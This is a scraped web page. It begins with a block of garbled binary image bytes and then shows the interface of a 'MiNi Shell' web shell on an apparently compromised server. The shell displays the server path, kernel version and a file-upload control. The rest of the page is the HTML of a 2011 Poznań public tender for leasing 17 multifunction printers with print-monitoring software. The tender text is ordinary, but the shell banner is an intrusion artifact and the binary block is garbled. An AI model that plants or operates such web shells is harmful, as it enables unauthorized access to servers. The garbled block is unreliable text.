JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110118/20841-N-2011.html

<p class="kh_header"><b>Poznań: Dzierżawa 17 cyfrowych urządzeń wielofunkcyjnych wraz z aplikacją zarządzająco - monitorującą na potrzeby Miejskiego Przedsiębiorstwa Gospodarki Mieszkaniowej S.A. 
w Poznaniu oraz konserwacja i naprawa tych urządzeń przez okres trwania dzierżawy</b><br>
<b>Numer ogłoszenia: 20841 - 2011; data zamieszczenia: 18.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Gospodarki Mieszkaniowej Spółka Akcyjna , ul. Rybaki 18a, 61-884 Poznań, woj. wielkopolskie, tel. 061 6579000, faks 061 6579009.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpgm.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Osoba prawna utworzona w celu zaspokajania potrzeb o charakterze powszechnym.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dzierżawa 17 cyfrowych urządzeń wielofunkcyjnych wraz z aplikacją zarządzająco - monitorującą na potrzeby Miejskiego Przedsiębiorstwa Gospodarki Mieszkaniowej S.A. 
w Poznaniu oraz konserwacja i naprawa tych urządzeń przez okres trwania dzierżawy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa dzierżawy 17 cyfrowych, fabrycznie nowych urządzeń wielofunkcyjnych wraz z aplikacją zarządzająco-monitorującą na potrzeby Miejskiego Przedsiębiorstwa Gospodarki Mieszkaniowej S.A. w Poznaniu, pełna instalacja systemu (instalacja i uruchomienie urządzeń we wskazanych pomieszczeniach, instalacja i konfiguracja oprogramowania, przeprowadzenie instruktażu dla pracowników), konserwacja i naprawa tych urządzeń przez okres trwania dzierżawy.

Urządzenia cyfrowe będące przedmiotem dzierżawy dzielą się na 3 grupy:
A)GRUPA 1 - urządzenia wielofunkcyjne (kopiarka -drukarka-skaner) monochromatyczne format A3  - 9 sztuk
B)GRUPA 2 - urządzenia wielofunkcyjne (kopiarka -drukarka -skaner - fax) monochromatyczne A4 -  7 sztuk
C)GRUPA 3 - urządzenia wielofunkcyjne (kopiarka -drukarka -skaner - fax) kolorowe A4 - 1 sztuki

Minimalne parametry techniczne urządzeń

Grupa 1 - urządzenia wielofunkcyjne (kopiarko - drukarka - skaner) monochromatyczne format A3 
-Prędkość kopiowania min. 30 kopii na minutę format A4
-Technologia: laserowa
-Format oryginału: A3
-Format kopii: A3
-Czas nagrzewania: maks. 30 sekund po włączeniu zasilania
-Czas do wykonania pierwszej kopii/wydruku nie więcej niż 5,5 sekundy
-Rozdzielczość kopiowania: 600x600dpi
-Obciążenie miesięczne: min. 20000 arkuszy A4
-Podawanie papieru: pojemność podajników nie mniejsza niż 1100 stron (80g/m2)
-Wielokrotność kopiowania: 1-999 kopii
-Zoom: 25-400%
-Moduł dupleksu w standardzie
-Automatyczny odwracający podajnik oryginałów
-Prędkość drukowania: min. 30 stron A4 na minutę
-Interfejsy standardowe: USB 2.0, Ethernet 10Base-T/100Base-TX
-Prędkość skanowania : min. 40 (czarno-białych)/15 (kolorowych) oryginałów na minutę
-Funkcje skanowania: skan do folderu, skan na email
-Podstawa pod kopiarkę
-Możliwość integracji drukarki z katalogiem ldap (pobieranie adresów e-mail)
-Oprogramowania do zdalnego zarządzania urządzeniami przez strukturę IT z możliwością generowania raportów takich jak:
1.Raport ogólny: informacja o poziomie tonera oraz papieru w kasetach ( w procentach) oraz o stanie urządzenia (sprawne/awaria)
2.Raport szczegółowy: szczegółowe dane o stanie urządzenia.
-Adres IP
-Nr seryjny maszyny 
-Nr karty sieciowej MAC
-Liczniki opcji (kopiarka, drukarka, fax) z podziałem na czarno-białe i kolorowe 
-Otwarte pokrywy
-Poziomy papierów ( z dokładnością do 25% lub ze stanem brak )
-Poziomy tonerów
-Poziom w zbiorniku zużytego tonera
-Przyczyna przestoju ( zacięcie, otwarte pokrywy, brak tonera, awaria )
-3 wsteczne raporty stanów licznika
3.Raport stanów licznika: informacja o stanach licznika - poprzedni/aktualny wraz z wyliczeniem kosztów wydruków
4.Raport konsumpcja tonera: informacja o datach i stanach licznika kiedy wymieniany był toner wraz z wyliczeniem średniego zużycia tonera.
5.Raport aktywny: automatyczne wysyłanie emaili do podanego w procesie konfiguracji adresata z następującymi danymi: 
a.brak tonera
b.brak papieru
c.zacięty papier
d.maszyna w stanie awarii z podaniem kodu błędu serwisowego 

Grupa 2 - urządzenia wielofunkcyjne (kopiarko - drukarka - skaner - fax) monochromatyczne format A4 
-Prędkość kopiowania/drukowania monochromatyczne: min. 24 kopii/wydruków A4 na minutę
-Technologia: laserowa
-Czas nagrzewania: maks. 20 sekund
-Czas uzyskania pierwszej kopii/wydruku min 12 sekund
-Wielokrotność kopiowania: 1-99 kopii
-Miesięczna obciążalność min 20000 stron
-Zoom: 50-200%
-Podawanie papieru: min. 250 arkuszy 
-Automatyczne kopiowanie/skanowanie dwustronne
-Automatyczny podajnik oryginałów
-Moduł dupleksu w standardzie
-Automatyczny odwracający podajnik oryginałów
-Interfejsy standardowe: USB 2.0, Ethernet 100/10Base-TX
-Rodzaj skanera: kolorowy
-Sterownik skanera: sieciowy TWAIN
-Faks G3
-Rodzaj faksu: LAN faks
-Funkcje skanowania: skan na email
-Możliwość integracji drukarki z katalogiem ldap (pobieranie adresów e-mail)
-Oprogramowania do zdalnego zarządzania urządzeniami przez strukturę IT z możliwością generowania raportów takich jak:
1.Raport ogólny: informacja o poziomie tonera oraz papieru w kasetach ( w procentach) oraz o stanie urządzenia (sprawne/awaria)
2.Raport szczegółowy: szczegółowe dane o stanie urządzenia.
-Adres IP
-Nr seryjny maszyny 
-Nr karty sieciowej MAC
-Liczniki opcji (kopiarka, drukarka, fax) z podziałem na czarno-białe i kolorowe 
-Otwarte pokrywy
-Poziomy papierów ( z dokładnością do 25% lub ze stanem brak )
-Poziomy tonerów
-Poziom w zbiorniku zużytego tonera
-Przyczyna przestoju ( zacięcie, otwarte pokrywy, brak tonera, awaria )
-3 wsteczne raporty stanów licznika
3.Raport stanów licznika: informacja o stanach licznika - poprzedni/aktualny wraz z wyliczeniem kosztów wydruków
4.Raport konsumpcja tonera: informacja o datach i stanach licznika kiedy wymieniany był toner wraz z wyliczeniem średniego zużycia tonera.
5.Raport aktywny: automatyczne wysyłanie emaili do podanego w procesie konfiguracji adresata z następującymi danymi: 
a.brak tonera
b.brak papieru
c.zacięty papier
d.maszyna w stanie awarii z podaniem kodu błędu serwisowego 

Grupa 3 - urządzenia wielofunkcyjne (kopiarko - drukarka - skaner - faks) kolorowe format A4 
-Prędkość kopiowania/drukowania kolorowe-monochromatyczne: min. 25 kopii/wydruków A4 na minutę
-Technologia: laserowa
-Czas nagrzewania: maks. 30 sekund
-Czas otrzymania pierwszego wydruku/kopi min. 13 sekund
-Miesięczna obciążalność min. 20000 stron
-Wielokrotność kopiowania: 1-99 kopii
-Zoom: 25-400%
-Podawanie papieru: min. 250 arkuszy 
-Automatyczny odwracający podajnik oryginałów
-Interfejsy standardowe: USB 2.0, Ethernet 100/10Base-TX
-Rodzaj skanera: kolorowy
-Faks G3
-Rodzaj faksu: LAN faks
-Funkcje skanowania: skan na email
-Możliwość integracji drukarki z katalogiem ldap (pobieranie adresów e-mail)
-Oprogramowania do zdalnego zarządzania urządzeniami przez strukturę IT z możliwością generowania raportów takich jak:
6.Raport ogólny: informacja o poziomie tonera oraz papieru w kasetach ( w procentach) oraz o stanie urządzenia (sprawne/awaria)
7.Raport szczegółowy: szczegółowe dane o stanie urządzenia.
-Adres IP
-Nr seryjny maszyny 
-Nr karty sieciowej MAC
-Liczniki opcji (kopiarka, drukarka, fax) z podziałem na czarno-białe i kolorowe 
-Otwarte pokrywy
-Poziomy papierów ( z dokładnością do 25% lub ze stanem brak )
-Poziomy tonerów
-Poziom w zbiorniku zużytego tonera
-Przyczyna przestoju ( zacięcie, otwarte pokrywy, brak tonera, awaria )
-3 wsteczne raporty stanów licznika
8.Raport stanów licznika: informacja o stanach licznika - poprzedni/aktualny wraz z wyliczeniem kosztów wydruków
9.Raport konsumpcja tonera: informacja o datach i stanach licznika kiedy wymieniany był toner wraz z wyliczeniem średniego zużycia tonera.
10.Raport aktywny: automatyczne wysyłanie emaili do podanego w procesie konfiguracji adresata z następującymi danymi:  
a.brak tonera
b.brak papieru
c.zacięty papier
d.maszyna w stanie awarii z podaniem kodu błędu serwisowego

Wszystkie urządzenia powinny mieć możliwość autoryzacji użytkownika przy pomocy karty zbliżeniowej. Zamawiający musi mieć możliwość samodzielnego rejestrowania nowych kart w systemie oraz tworzenia duplikatów kart dostępowych. Oferta musi zawierać karty dostępowe - 300 sztuk - wliczone w cenę dzierżawy urządzeń.
Zamawiający dopuszcza możliwość zastosowania zewnętrznego terminala do autoryzacji użytkownika. Urządzenia musza mieć również możliwość pracy bez podłączania urządzenia autoryzacyjnego.
Uwaga: drukowanie/kopia jednej strony formatu A3 liczone są jak drukowanie/kopia dwóch stron formatu A4.

Zamawiający wymaga osobnych serwerów wydruków dla każdej z podsieci (7 podsieci) - pomiędzy podsieciami może być przesyłana jedynie informacja dotycząca autoryzacji użytkownika oraz informacje dla aplikacji rozliczającej. 
Autoryzacja użytkownika musi się odbywać przy pomocy jednej centralnej bazy danych zintegrowanej z serwerem LDAP (Open LDAP na systemie Linux)
Zamawiający umożliwia zainstalowanie oprogramowania zarządzająco-monitorującego na siedmiu posiadanych serwerach z systemem Linux Fedora (jądro 2,6). 
W przypadku zastosowania oprogramowania zarządzająco-monitorującego, którgo nie można zainstalować na systemie Linux Fedora (jądro 2.6) Zamawiający wymaga, aby oferta obejmowała również sprzęt niezbędny do uruchomienia systemu.

Parametry techniczne aplikacji zarządzająco-monitorującej
1.Aplikacja monitorowania i rozliczania wydruków umożliwi określenie kosztów, ilości stron, typu drukowanych dokumentów, formatu, użytego koloru, rozdzielczości, nazwy dokumentu w rozbiciu na użytkowników, elementy struktury organizacyjnej oraz na poszczególne urządzenia.
2.Aplikacja powinna umożliwić jednoczesną pracę dla 300 użytkowników
3.Aplikacja musi mieć możliwość zapisywania ustawień skanera i drukarki indywidualnie dla poszczególnych użytkowników (w szczególności adres e-mail na który wysyłany będzie scan, typ dokumentu do jakiego ma być wykonywany scan, możliwość domyślnego ustawienia wydruku dwustronnego)
4.Aplikacja umożliwi określenie limitów druku miękkich (po przekroczeniu generowana jest informacja o przekroczeniu).
5.Aplikacja - część kliencka powinna działać na systemach Windows XP, 2000, Vista, Windows 7 (32-bit), Windows 7 (64 bit), Linux (32 bit), Linux (64 bit) 
6.Aplikacja zmonitoruje prace wykonywane na urządzeniach sieciowych oraz lokalnych i lokalnych udostępnianych w sieci. Aplikacja zmonitoruje prace wykonywane na urządzeniach podłączonych interfejsami Ethernet, Wi-Fi, USB oraz LPT.
7.Aplikacja zmonitoruje wydruki wykonywane we wszystkich standardach, czyli PCL, Postscript, RPCS i innych.
8.Aplikacja umożliwi generowanie raportów na podstawie przygotowanych szablonów.
9.Aplikacja rozliczy także koszty wykonywanych kopii na poszczególnych użytkowników, elementy struktury organizacyjnej oraz urządzenia.
10.Zabezpieczenie poufności wydruków i kopii, poprzez zwalnianie prac po autoryzacji użytkownika.
11.Gromadzenie danych o wykonywanych wydrukach lokalnych pomimo czasowego nie funkcjonowania centralnego serwera przechowującego dane o wykonywanych pracach. Informacje są przechowywane lokalnie w formacie plikowym i przesyłane do centralnego serwera (bazy danych) w momencie, kiedy jest on tylko dostępny w sieci.
12.Serwer w lokalizacji Zarząd (BZ) powinien obsługiwać centralną bazę użytkowników.

Warunki serwisu
-Zamawiający będzie wymagał czasu reakcji na poziomie 4 godzin roboczych z maksymalnym czasem naprawy 8 godzin, po którym jeśli nie uda się uruchomić urządzenia Wykonawca ma zapewnić sprzęt zastępczy o niegorszych parametrach, używających sterowników takich samych jak sprzęt zabrany do naprawy. Dla każdego urządzenia wymagany jest dostarczony toner zapasowy.
-Koszt kopii/wydruk - koszt ten ma zawierać koszt wszystkich materiałów eksploatacyjnych, części zamiennych oraz usług serwisowych potrzebnych do utrzymania urządzenia w stanie pracy i zapewnienie najwyższej jakości kopii/wydruku. 
-Zakres napraw i konserwacji obejmuje:
a)lokalizację usterek wraz z wymianą uszkodzonych części,
b)przeglądy stanu technicznego urządzeń,
c)standardowe czynności konserwacyjne związane z czyszczeniem, smarowaniem oraz wymianą zużytych elementów eksploatacyjnych (rolki, gumki, itp.),
d)do naprawy zostaną użyte oryginalne, nowe części zamienne.

Wykaz miejsc, w których rozmieszczony będzie sprzęt będący przedmiotem dzierżawy.  				
1.ZARZĄD ( BZ )	Poznań, ul. Rybaki 18a Grupa 1-3 szt,Grupa 3-1szt, Serwery wydruku -1 szt
2.BOM 1Poznań, ul. Paszty 6 Grupa 1-1 szt, Grupa 2-1 szt,Serwery wydruku -	1 szt
3.BOM 2Poznań, ul. 23 Lutego 4/6 Grupa 1-1 szt, Grupa 2-1 szt,Serwery wydruku -1 szt
4.BOM 3Poznań, ul. Św. Marcin 51 Grupa 1-1 szt, Grupa 2-1 szt,Serwery wydruku -1 szt
5.BOM 4Poznań, ul. Łozowa 26 Grupa 1-1 szt, Grupa 2-1 szt,Serwery wydruku -1 szt
6.BOM 5Poznań, ul. Nehringa 2 Grupa 1-1 szt, Grupa 2-1 szt,Serwery wydruku -1 szt
7.BOM 6Poznań, ul. Brzask 3 Grupa 1-1 szt, Grupa 2-1 szt,Serwery wydruku -1 szt
8.POGOTOWIE TECHNICZNE ( PT )	Poznań, ul. Janickiego 20 Grupa 2-1 szt.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.00.00-6, 50.31.30.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych szczegółowych wymagań.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali lub wykonują minimum 1 usługę, odpowiadającą swoim rodzajem i wartościom usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorcy oraz załączenia dokumentu potwierdzającego, że ta usługa została wykonana lub jest wykonywana należycie.
Zamawiający za usługi odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia uzna: usługi polegające na dzierżawie bądź dzierżawie, naprawie i konserwacji cyfrowych urządzeń wielofunkcyjnych o wartości co najmniej 300 000 zł brutto. Formularz wykazu usług stanowi załącznik nr 5do IDW.
Ocena spełnienia tych warunków  zostanie dokonana na podstawie złożonych oświadczeń i dokumentów wg. formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych szczegółowych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych szczegółowych wymagań.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych szczegółowych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz oferowanego sprzętu, wraz ze specyfikacją techniczną urządzeń (dokładna nazwa producenta i model urządzenia) Nazwa oferowanego oprogramowania (aplikacji zarządzająco-monitorującej) - dokładna nazwa oprogramowania, numer wersji stanowiący załącznik nr 2 do IDW.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych, Zamawiający przewiduje możliwość dokonania zmian postanowień umowy zawartej z wybranym Wykonawcą w następujących przypadkach:
1.W przypadku zmiany strukturalnych stron umowy, takich jak zmiana formy organizacyjno-prawnej Wykonawcy, zmiana firmy pod, którą działa Wykonawca, zmiana osoby uprawnionej do składania oświadczeń w imieniu Wykonawcy, powodujących potrzebę wprowadzenia do treści umowy zmian neutralnych lub korzystnych dla Zamawiającego, w zakresie dokonanych zmian strukturalnych;
2.W przypadku udzielenia zamówienia podwykonawcom w innej części niż wskazana w ofercie Wykonawcy, w zakresie możliwości przekazania innej części zamówienia podwykonawcom, niż wskazano w umowie;
3.W przypadku zamiany osób wskazanych w umowie jako reprezentantów stron przy realizacji zamówienia;
4.Możliwość dokonania każdej ze zmian np. w zakresie przedmiotu umowy, terminu wykonania przedmiotu umowy, w przypadku gdy z uwagi na liczne przeszkody spowodowane na skutek siły wyższej wykonanie umowy stało się niemożliwe. Przez siłę wyższą należy rozumieć zdarzenie zewnętrzne, wynikłe po podpisaniu umowy, którego nie można było przewidzieć, uniknąć ani jemu zapobiec przy zachowaniu wszelkich należytych środków, niezależne od stron umowy. Zdarzeniami siły wyższej są takie zdarzenia jak: klęski żywiołowe, anomalie klimatyczne, wojny, rewolucje, zamachy stanu, akty terrorystyczne, konfiskaty, nacjonalizacje i inne podobne decyzje władz państwowych.;
